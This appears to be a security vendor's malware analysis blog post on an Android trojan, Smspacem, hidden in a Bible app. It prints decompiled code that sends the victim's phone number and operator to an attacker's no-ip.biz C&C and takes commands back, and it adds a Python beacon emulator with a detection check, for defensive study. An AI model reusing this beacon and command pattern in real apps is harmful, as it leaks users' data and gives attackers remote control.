A few days ago, a new malware named Android/Smspacem.A!tr appeared for Android users. This malware trojans a legitimate (but controversial) application named the Holy F***ing Bible. Its malicious behavior only showed on May 21-22: it changed the device's wallpaper and sent anti-Christian joke SMS messages to all of the user's phone contacts. The malware also reacts to a few commands: "health" (SMS command), "formula401" and "pacem" (Web service commands, obtained by polling a Web service on a Command & Control server). The actions the malware takes upon those commands are nicely illustrated here.
To my knowledge, processing commands via a Web service is a "first". Below, we explain the code for those who are not very familiar with Web services:
SoapObject localSoapObject1 = new org/ksoap2/serialization/SoapObject;
SoapObject localSoapObject2 = localSoapObject1;
String str7 = "http://tempuri.org/";
String str8 = "openmic";
localSoapObject2.<init>(str7, str8);
This code is not very readable because it is the raw output of a Dex-to-Java decompiler (the object allocation and the constructor call, <init>, appear as two separate steps), but basically we see here that the malware is instantiating a SOAP object. The documentation of org.ksoap2.serialization.SoapObject explains:
SoapObject(java.lang.String namespace, java.lang.String name)
So, http://tempuri.org/ is an XML namespace (it is the default placeholder namespace of an ASP.NET Web service, which the .asmx endpoint below confirms) and is not something malicious in itself; openmic is the method / Web service the malware wishes to call.
Then, the code goes on as follows:
String str9 = this.val$cellnumb;
SoapObject localSoapObject3 = localSoapObject1;
String str10 = "cell";
String str11 = str9;
SoapObject localSoapObject4 = localSoapObject3.addProperty(str10, str11);
String str12 = this.val$opname;
SoapObject localSoapObject5 = localSoapObject1;
String str13 = "opname";
String str14 = str12;
SoapObject localSoapObject6 = localSoapObject5.addProperty(str13, str14);
This code shows that two properties are added to the SOAP object: a property named "cell", which contains the phone number of the infected device, and a property named "opname", which contains the name of the mobile operator. Both values (phone number and operator name) are collected by the malware at startup.
Then, the malware needs to send this SOAP object to a remote Web site. To do so, it serializes the object (we skip the code corresponding to this part; in brief, the object ends up in an envelope named localSoapSerializationEnvelope1). Below, we see it sends the SOAP envelope via HTTP POST to a remote address controlled by the attacker (a simple C&C server), with the SOAP action "http://tempuri.org/openmic".
Finally, it reads the answer from that C&C (such as "formula401" or "pacem") as a string:
AndroidHttpTransport localAndroidHttpTransport1 = new org/ksoap2/transport/AndroidHttpTransport;
AndroidHttpTransport localAndroidHttpTransport2 = localAndroidHttpTransport1;
String str15 = "http://[REMOVED].no-ip.biz/talktome.asmx";
localAndroidHttpTransport2.<init>(str15);
AndroidHttpTransport localAndroidHttpTransport3 = localAndroidHttpTransport1;
String str16 = "http://tempuri.org/openmic";
SoapSerializationEnvelope localSoapSerializationEnvelope4 = localSoapSerializationEnvelope1;
localAndroidHttpTransport3.call(str16, localSoapSerializationEnvelope4);
String str17 = ((SoapPrimitive) localSoapSerializationEnvelope1.getResponse()).toString();
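To make the exchange concrete (both the beacon the bot sends and the reply it expects), here is an added example that reconstructs it in Python. This is not the malware's code and not Fortinet's tooling: it only follows the decompiled ksoap2 fragments above. It assumes the envelope layout ksoap2 emits for a SOAP 1.1 call and the reply shape of an ASP.NET .asmx service (openmicResponse/openmicResult); the exact namespace prefixes, the sample phone number and the operator name are constructed for illustration, and nothing touches the network. The last function is the kind of check a network-side analyst would want, and it deliberately does not key on tempuri.org alone, since every unconfigured ASP.NET service uses that namespace.

```python
from __future__ import annotations

import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Values taken from the decompiled sample above.
NAMESPACE = "http://tempuri.org/"
METHOD = "openmic"
SOAP_ACTION = NAMESPACE + METHOD          # "http://tempuri.org/openmic"
SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
# Commands the post says the bot reacts to when they come back from the Web service.
WEB_COMMANDS = {"formula401", "pacem"}


def build_openmic_request(cell: str, opname: str) -> tuple[dict, bytes]:
    """Return (HTTP headers, POST body) for the startup beacon.

    Mirrors the decompiled code: SoapObject(NAMESPACE, METHOD) with two string
    properties, 'cell' and 'opname', wrapped in a SOAP 1.1 envelope. The prefix
    names (v, i, d) approximate ksoap2's serializer and are an assumption.
    """
    body = (
        f'<v:Envelope xmlns:v="{SOAP_ENV}" '
        'xmlns:i="http://www.w3.org/2001/XMLSchema-instance" '
        'xmlns:d="http://www.w3.org/2001/XMLSchema">'
        "<v:Header/><v:Body>"
        f'<{METHOD} xmlns="{NAMESPACE}">'
        f'<cell i:type="d:string">{escape(cell)}</cell>'
        f'<opname i:type="d:string">{escape(opname)}</opname>'
        f"</{METHOD}></v:Body></v:Envelope>"
    ).encode()
    headers = {
        "Content-Type": "text/xml; charset=utf-8",
        "SOAPAction": SOAP_ACTION,        # the str16 value passed to call()
        "Content-Length": str(len(body)),
    }
    return headers, body


def constructed_cnc_reply(command: str) -> bytes:
    """Constructed stand-in for the .asmx server's answer (no real server here)."""
    return (
        f'<soap:Envelope xmlns:soap="{SOAP_ENV}"><soap:Body>'
        f'<{METHOD}Response xmlns="{NAMESPACE}">'
        f"<{METHOD}Result>{escape(command)}</{METHOD}Result>"
        f"</{METHOD}Response></soap:Body></soap:Envelope>"
    ).encode()


def parse_openmic_response(xml_bytes: bytes) -> str:
    """Extract the command string, i.e. what ksoap2's getResponse() hands back.

    Returns "" when the reply is malformed or carries no openmicResult, so a
    broken or empty answer from the C&C never turns into a command.
    """
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return ""
    result = root.find(f".//{{{NAMESPACE}}}{METHOD}Result")
    return (result.text or "").strip() if result is not None else ""


def dispatch(command: str) -> str:
    """Map a C&C reply onto an action label (no side effects in this example)."""
    return f"run:{command}" if command in WEB_COMMANDS else "ignore"


def looks_like_smspacem_beacon(headers: dict, body: bytes) -> bool:
    """Network-side check: SOAPAction for openmic plus the cell/opname parameters.

    tempuri.org by itself is not an indicator (it is ASP.NET's default namespace),
    so the match requires the method name and both parameter names together.
    """
    if headers.get("SOAPAction", "").strip('"') != SOAP_ACTION:
        return False
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return False
    call = root.find(f".//{{{NAMESPACE}}}{METHOD}")
    if call is None:
        return False
    params = {child.tag.split("}")[-1] for child in call}
    return {"cell", "opname"} <= params


if __name__ == "__main__":
    # Constructed sample values; a real device would supply its own number/operator.
    hdrs, req = build_openmic_request("+15555550100", "ExampleMobile")
    print(hdrs["SOAPAction"], req.decode(), sep="\n")
    print(dispatch(parse_openmic_response(constructed_cnc_reply("pacem"))))
```

The parser returns an empty string rather than raising on a malformed reply, which is the behaviour you want both when emulating the bot against a sinkhole and when replaying captured traffic through the detection check.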
I support Irfan Asrar's opinion that this malware targets US end users. I would even go a bit further and say that the malware author lives in the US. In fact, as Asrar also noted, there are several references to the Colbert Report, an American satirical late-night television program:
- on May 21, the malware sets an image of Stephen Colbert as wallpaper
- formula401 refers to a well-known recurring segment of the Colbert Report
- the Android malware is named holycolbert10.apk
A technical hint also suggests that the author might live in the US: the C&C appears to be located in Miami.
Also, the IP address very much looks like it belongs to a home user's DSL connection rather than to a hosting provider. The author could very well be a talented developer with a strange sense of humor (and little ethics), which would explain why this malware does not really look like the ones Fortinet usually analyzes: in particular, there does not seem to be any financial motivation behind it, just something to "show off" (?) or to annoy a few people.
We want to remind our readers that this kind of malware author is becoming very scarce. These days, malware authors write their malicious code for money, not for fun or for technical pride.
– the Crypto Girl.